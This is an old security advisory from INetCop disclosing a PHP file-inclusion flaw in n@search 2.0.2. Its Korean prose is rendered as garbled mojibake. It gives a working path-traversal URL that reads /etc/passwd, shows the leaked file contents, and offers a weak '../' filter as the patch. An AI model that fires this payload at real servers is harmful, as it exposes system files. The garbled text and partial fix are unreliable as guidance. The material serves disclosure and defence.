======================================== INetCop Security Advisory #2004-0x82-024 ======================================== * Title: Nasearch PHP Injection exploit 0x01. Description PHP ÇÁ·Î±×·¡¹Ö Áß ÁÖÀÇÇØ¾ß ÇÒ °ÍÀÌ ¹Ù·Î PHP Injection Ãë¾àÁ¡ÀÔ´Ï´Ù. ´ëÇѹα¹ÀÇ ¸¹Àº °Ô½ÃÆÇ ¹× À¥ ¼Ö·ç¼ÇµéÀÌ ¹Ù·Î ÀÌ Ãë¾àÁ¡¿¡ ¹«·ÂÈ­µË´Ï´Ù. ÀúÈñ INetCop Security Team¿¡¼­´Â ´ÙÀ½°ú °°Àº nasearch Ãë¾àÁ¡À» ¹ß°ßÇÏ¿´½À´Ï´Ù. nasearch/skin/empas/preview.php ... include"../../header.inc"; include"../../nasch_connect.php"; include"../../lib.php"; include"../../$module"; ... $module º¯¼ö´Â °ø°Ý targetÀÌ µÉ °ÍÀÔ´Ï´Ù. 0x02. Vulnerable Packages Vendor site: http://navyism.com/ n@search 2.0.2 -nasearch202.zip +Unix +Linux +Other 0x03. Exploit ±×°ÍÀº ¸Å¿ì °£´ÜÇÏ°Ô exploit µÉ ¼ö ÀÖ½À´Ï´Ù. local ÆÄÀÏÀ» ºÒ·¯¿Ã ¼ö ÀÖÀ¸¸ç, ƯÁ¤ PHP ¹®¹ýÀ» ½ÇÇàÇÏ¿© ¹éµµ¾î·Î »ç¿ëµÉ ¼ö ÀÖ½À´Ï´Ù. ´ÙÀ½Àº /etc/passwd ÆÄÀÏ ³»¿ëÀ» ºÒ·¯¿À´Â °ø°Ý ¿¹Á¦ÀÔ´Ï´Ù. http://nasearch_host/skin/empas/preview.php?module=../../../../../../../../etc/passwd °ø°Ý °á°ú: -- root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp: operator:x:11:0:operator:/root: games:x:12:100:games:/usr/games: gopher:x:13:30:gopher:/usr/lib/gopher-data: ftp:x:14:50:FTP User:/home/ftp: nobody:x:99:99:Nobody:/: .. /etc/passwd ÆÄÀÏ ³»¿ëÀÌ È­¸é¿¡ Ãâ·ÂµÊ .. -- 0x04. Patch ¹®¹ýÀûÀ¸·Î ¸·À» ¼ö ÀÖ´Â ¹æ¹ýÀº ´ÙÀ½°ú °°½À´Ï´Ù. nasearch/skin/empas/preview.php: ... // patch core if(eregi("..\/",$module)) { printf("\$module error"); exit; } ... -- °¨»çÇÕ´Ï´Ù. -- By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security. MSN & E-mail: szoahc(at)hotmail(dot)com, xploit(at)hackermail(dot)com INetCop Security Home: http://www.inetcop.org (Korean hacking game) My World: http://x82.inetcop.org GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y --